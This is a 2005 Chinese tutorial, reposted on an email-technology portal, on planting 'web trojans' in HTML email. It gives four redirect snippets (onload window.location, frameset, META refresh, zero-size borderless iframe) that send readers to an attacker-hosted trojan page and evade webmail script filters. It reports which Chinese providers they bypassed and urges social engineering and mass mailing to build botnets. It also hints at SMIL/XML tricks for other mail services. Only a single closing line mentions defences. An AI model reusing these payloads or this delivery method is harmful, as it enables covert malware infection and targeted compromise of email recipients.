首页 | 邮件资讯 | 技术教程 | 解决方案 | 产品评测 | 邮件人才 | 邮件博客 | 邮件系统论坛 | 软件下载 | 邮件周刊 | 热点专题 | 工具
网络技术 | 操作系统 | 邮件系统 | 客户端 | 电子邮箱 | 反垃圾邮件 | 邮件安全 | 邮件营销 | 移动电邮 | 邮件软件下载 | 电子书下载

邮件网络安全

系统安全 | 邮件软件漏洞 | 攻防技术 | 安全基础 | 病毒公告 | 病毒查杀 | Forefront/TMG/ISA | 防火墙 | 数字签名 |
首页 > 邮件网络安全 > 安全基础知识 > 网络安全暴风雨先驱 邮件网页木马 > 正文

网络安全暴风雨先驱 邮件网页木马

出处:网络 作者:请作者联系 时间:2005-9-13 8:49:00
大家肯定对网页木马已经很熟悉了,但大家可能对邮件网页木马还不是很熟悉。其实这个也许有些高手以前已经发现并使用很久了。但我一直未见网上及杂志上有此方面的内容。这里我就以技术共享的原则跟大家谈谈邮件网页木马的思路及实现方法。

     大家肯定对网页木马已经很熟悉了,但大家可能对邮件网页木马还不是很熟悉。其实这个也许有些高手以前已经发现并使用很久了。但我一直未见网上及杂志上有此方面的内容。这里我就以技术共享的原则跟大家谈谈邮件网页木马的思路及实现方法。

    邮件网页木马的危害巨大,它能化被动为主动。目前网络上流行的网页木马其实是很被动的,它需要被害者点击目标网址。随着现在网民的安全观念的增强,网民一般不会轻易点击陌生的网址。但邮件网页木马就不一样了,你可以将电子邮件发送到你想要攻击的目标信箱。只要你根据社会工程学及心理学的知识,将邮件的标题看上去不明显像是垃圾邮件或广告,那么接收者肯定会点击此邮件的。只要他点击了此邮件主题,看了信,哈哈,他就中招了!当然你也可以通过邮件群发器,这样的话,传播速率比普通的网页木马以及电子书木马不知高多少呢!而且它有个最大的优点,那就是具有目标可指定性。它可以攻击你想要的指定用户。这一点是普通方法无法比拟的。

    邮件网页木马其实就是在发E-mail以HTML方式内嵌网页木马,使邮件本身成为一张网页木马。到这时你也许回大呼,我怎么没想到啊!呵呵,不怕做不到,只怕想不到啊。其实有些技术本身并不难,但就是怕不往这方面想啊。我还是赶快转入正题吧,否则,坏柿子扔过来啦!闪!

    聪明的你此时可能会说,邮件网页木马岂不是很简单啊,只要在发邮件是选择以HTML方式发送,再将网页木马的源代码写入即可。事实上当然没这么简单,因为国内的绝大部分电子信箱都对其中一些关键代码进行的屏蔽过滤。因而本文将重点研究怎样突破重围,在电子邮件中引入网页木马,达到我们的目的。

    一般的网页木马都用到javasccript,但绝大部分邮件系统都对<script>标记作了屏蔽。从而我们只能另辟新法。我们可以不直接将网页木马的代码写入邮件中,因为如果写入的话,有关代码会被屏蔽,网页木马将失效。我们可以写入转向代码,使用户浏览此邮件时转向我们放在自己网站上的网页木马。当然,邮件网页木马的难点就在转向代码。写转向代码要有讲究,因为写得不巧妙的话,代码将会被邮件系统屏蔽。
下面笔者来谈谈几种有效的可以在电子邮件中引入网页木马的且没被邮件服务器屏蔽的转向代码。因为绝大部分邮件系统都对<script>标记作了屏蔽,所以为了转向代码有效,均不使用JS和VBS标记。

    1. window.location 法,代码如下

    <body onload="window.location='http://xxxxx';"></body>
    2. 框架法,代码如下

    <frameset cols="100%,*">
    <frame src=http://xxxxx scrolling="auto">
    </frameset>
    其中scrolling参数值得注意,合理使用可加强隐蔽性。Cols参数可根据自己的实际情况作更改。

    3. META标志法,代码如下

    <META HTTP-EQUIV="Refresh" CONTENT="0;URL= http://xxxxx">
    其中CONTENT后面的阿拉伯数字是代表过几秒中钟转入目标网页。

    4. iframe内帧法

    <iframe src=http://xxxxx width="0" height="0" frameborder="0">
    其中width="0" height="0"是引入网页的大小尺寸,可以根据你的实际需要加以调整。其中的frameborder参数也很重要,如果使用的恰当的话,可以增强邮件网页木马的隐蔽性。为了大家看的清楚,我将widt和height均设置的非零数值,转向的是**的首页(如果转向的是放在自己网站上的网页木马,呵呵......)。

    大家由上面两幅图即可知道,如果设置为frameborder=1,邮件中可看见邮件服务器自动加带的页脚广告。而设置为frameborder=0,则如图2所示,它不像普通的信件一样看见邮件服务器自动加带的广告。大家可根据具体情况选择frameborder参数来获得最好的伪装引入效果,使对方感觉不到他所浏览的邮件是已经转向到你的网站上的网页木马。

    上述代码笔者已经对国内的几乎所有电子信箱作了测试,如网易,搜狐,新浪,亿唐,21CN,TOM等等。以上四种方法各有千秋。第一种方法的适应范围最小。比如网易、亿唐都屏蔽了它。但第2、3、4方法在国内的信箱测试中均通过。尤其第2、3种方法几乎百试百灵。当然第4种方法也很经典,参数多,隐蔽性强。大家可根据不同的目标信箱选择最有效的转向引入代码。

    现在只要大家会制作网页木马(关于网页木马木马的制作方法,大家可以参见以往的黑防),拥有了性能优秀的后门程序或木马程序,再配合本文所讲的邮件木马引入技术的话,贪心的再来个邮件群发,呵呵,你必将为所欲为,肉鸡成群。而且,这种方法具有攻击目标可指定性的优点!一场暴风雪即将来临!大家以后还是少在公开场合公布信箱哟!当然,稳妥的措施是邮件服务器实行严格个代码过滤,用户将邮件查看方式设置为以文本方式查看!

    后记:笔者顺便还对几个国外著名的邮箱:hotmail以及Yahoo作了测试,发现它们过滤得都非常严格。上述的4种方法的代码都被过滤了。此时我深感国内邮件提供商与国外的差距。安全观念的差距!但hotmail以及Yahoo并不是固若金汤。以色列网络安全公司GreyMagic Software已经发现hotmail以及Yahoo邮箱也存在过滤不严的漏洞。我们可以用同步多媒体集成语言的(SMIL)的HTML+TIME技术来突破屏蔽,实现转向引入网页木马的目的。庆幸的是此漏洞最近已经被hotmail以及Yahoo修补。但国内的几乎所有电子信箱均存在此漏洞。当然深爱钻研技术的你肯定会问,现在是否有针对hotmail以及Yahoo邮箱的有效的转向引入代码。答案是肯定的!这个问题留给大家思考,大家可以向xml方向去发散,相信你一定会找到的!

,
相关文章 热门文章
  • 假安全通知邮件现身 微软警告其含木马病毒
  • 奥巴马性爱视频?不,木马垃圾邮件!
  • “麦当娜性爱录像”传播木马病毒
  • 利益驱动木马联合病毒邮件发起针对性攻击
  • 木马自动创建邮箱账户 目标转向Gmail
  • 国家计算机病毒中心发现大量发送垃圾邮件新木马
  • 警惕垃圾邮件新木马 请用户注意防范
  • 大量垃圾邮件近期有“木马”
  • 木马程序HotLan将目标转向Gmail电子邮箱
  • 私人邮箱谨防木马入侵
  • 自动创建网邮账户的木马将目标转向Gmail
  • 打造坚实Vista防火墙 防范木马病毒入侵
  • 巧妙隐藏IP地址做网上“隐身”人
  • SYMANTEC NAV 9.0中文企业版的安装
  • Rapid Restore PC安装及使用步骤
  • DoS 拒绝服务攻击
  • 如何实现VPN使用脱离内部网络的IP地址
  • 关于卡巴斯基使用的个人经验综合
  • 常用端口对照详解
  • 免费端口监控软件Port Reporter
  • 宽带拨号连接密码恢复原理
  • 网络端口及其详解
  • 图解McAfee的使用方法
  • 网络安全技巧大全
  • 自由广告区
     
    最新软件下载
  • SharePoint Server 2010 部署文档
  • Exchange 2010 RTM升级至SP1 教程
  • Exchange 2010 OWA下RBAC实现的组功能...
  • Lync Server 2010 Standard Edition 标..
  • Lync Server 2010 Enterprise Edition...
  • Forefront Endpoint Protection 2010 ...
  • Lync Server 2010 Edge 服务器部署文档
  • 《Exchange 2003专家指南》
  • Mastering Hyper-V Deployment
  • Windows Server 2008 R2 Hyper-V
  • Microsoft Lync Server 2010 Unleashed
  • Windows Server 2008 R2 Unleashed
  • 今日邮件技术文章
  • 腾讯,在创新中演绎互联网“进化论”
  • 华科人 张小龙 (中国第二代程序员 QQ...
  • 微软推出新功能 提高Hotmail密码安全性
  • 快压技巧分享:秒传邮件超大附件
  • 不容忽视的邮件营销数据分析过程中的算..
  • 国内手机邮箱的现状与未来发展——访尚..
  • 易观数据:2011Q2中国手机邮箱市场收入..
  • 穿越时空的爱恋 QQ邮箱音视频及贺卡邮件
  • Hotmail新功能:“我的朋友可能被黑了”
  • 入侵邻居网络发骚扰邮件 美国男子被重..
  • 网易邮箱莫子睿:《非你莫属》招聘多过..
  • 中国电信推广189邮箱绿色账单
  • 最新专题
  • 鸟哥的Linux私房菜之Mail服务器
  • Exchange Server 2010技术专题
  • Windows 7 技术专题
  • Sendmail 邮件系统配置
  • 组建Exchange 2003邮件系统
  • Windows Server 2008 专题
  • ORF 反垃圾邮件系统
  • Exchange Server 2007 专题
  • ISA Server 2006 教程专题
  • Windows Vista 技术专题
  • “黑莓”(BlackBerry)专题
  • Apache James 专题
  • 分类导航
    邮件新闻资讯:
    IT业界 | 邮件服务器 | 邮件趣闻 | 移动电邮
    电子邮箱 | 反垃圾邮件|邮件客户端|网络安全
    行业数据 | 邮件人物 | 网站公告 | 行业法规
    网络技术:
    邮件原理 | 网络协议 | 网络管理 | 传输介质
    线路接入 | 路由接口 | 邮件存储 | 华为3Com
    CISCO技术 | 网络与服务器硬件
    操作系统:
    Windows 9X | Linux&Uinx | Windows NT
    Windows Vista | FreeBSD | 其它操作系统
    邮件服务器:
    程序与开发 | Exchange | Qmail | Postfix
    Sendmail | MDaemon | Domino | Foxmail
    KerioMail | JavaMail | Winwebmail |James
    Merak&VisNetic | CMailServer | WinMail
    金笛邮件系统 | 其它 |
    反垃圾邮件:
    综述| 客户端反垃圾邮件|服务器端反垃圾邮件
    邮件客户端软件:
    Outlook | Foxmail | DreamMail| KooMail
    The bat | 雷鸟 | Eudora |Becky! |Pegasus
    IncrediMail |其它
    电子邮箱: 个人邮箱 | 企业邮箱 |Gmail
    移动电子邮件:服务器 | 客户端 | 技术前沿
    邮件网络安全:
    软件漏洞 | 安全知识 | 病毒公告 |防火墙
    攻防技术 | 病毒查杀| ISA | 数字签名
    邮件营销:
    Email营销 | 网络营销 | 营销技巧 |营销案例
    邮件人才:招聘 | 职场 | 培训 | 指南 | 职场
    解决方案:
    邮件系统|反垃圾邮件 |安全 |移动电邮 |招标
    产品评测:
    邮件系统 |反垃圾邮件 |邮箱 |安全 |客户端
    广告联系 | 合作联系 | 关于我们 | 联系我们 | 繁體中文
    版权所有:邮件技术资讯网©2003-2010 www.5dmail.net, All Rights Reserved
    www.5Dmail.net Web Team   粤ICP备05009143号